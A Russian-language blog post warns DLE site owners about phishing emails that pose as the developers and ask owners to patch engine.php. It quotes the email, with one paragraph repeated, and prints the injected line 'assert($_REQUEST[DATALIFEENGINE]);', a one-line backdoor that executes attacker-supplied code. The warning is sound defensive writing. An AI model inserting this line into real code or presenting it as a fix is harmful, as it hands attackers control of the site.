Недавно наткнулся на статью «Взлом DLE новый способ», суть его в рассылке на почту пользователям дле сообщения о новой уязвимости и как это устранить. Однако вместо устранения уязвимости, вы наоборот даете возможность мошенникам получить доступ к важным файлам с помощью которых можно получить доступ администратора. Что представляет новый способ взлом dle?
Подобным способом взлома пользуются давно, суть её в простом обмане. В случаи владельцу сайта с системой управления платформы DataLife Engine оправляется письмо на почтовый адрес имейл от имени разработчиков движка DLE, такая рассылка в определенное время и правда происходит если вы купили лицензию. В сообщение подробно описывается новая уязвимость платформы DataLife Engine всех версий, владельцев сайтов просят исправить проблему с помощью добавления строчек кода в некоторые файлы скрипта.
Вот пример текст письма:
Уведомляем вас о том, что силами наших специалистов была обнаружена критическая уязвимость во всех версиях «DataLife Engine». При помощи данной уязвимости злоумышленники могут легко получить доступ к панели управления уязвимого сайта. Проблема заключается в недостаточной фильтрации данных. Уязвимость является крупнейшей за все 10 лет разработки «DataLife Engine», примерно 90% сайтов на «Data Life Engine» могут быть взломаны при помощи неё.
К сожалению, ваш сайт входит в число уязвимых сайтов и может быть взломан в любой момент. Просим вас серьёзно отнестись к данной проблеме и устранить уязвимость, следуя инструкции ниже:
Для исправления откройте файл вашего сайта: /engine/engine.php и в самое начало файла после строчки:
добавьте:
К сожалению, ваш сайт входит в число уязвимых сайтов и может быть взломан в любой момент. Просим вас серьёзно отнестись к данной проблеме и устранить уязвимость, следуя инструкции ниже:
Для исправления откройте файл вашего сайта: /engine/engine.php и в самое начало файла после строчки:
<?php добавьте:
assert($_REQUEST[DATALIFEENGINE]);Однако если зайти на официальный сайт разработчиков «Data Life Engine» в соответствующий раздел, то вы не найдем информации о новой уязвимости, что подозрительно, ведь первое сообщение об этом появляется именно на официальном сайте разработчиков.
Если внимательно изучить письмо, то мы увидим, что сообщение отправлено через форму обратной связи на сайте. А исправления якобы уязвимости не устраняет её, а наоборот создает.
Будьте внимательны и любую информацию проверяйте. Стоит отметить, что подобные письма могу прийти и тем, кто пользуется нулл версией движка.
Комментарии 1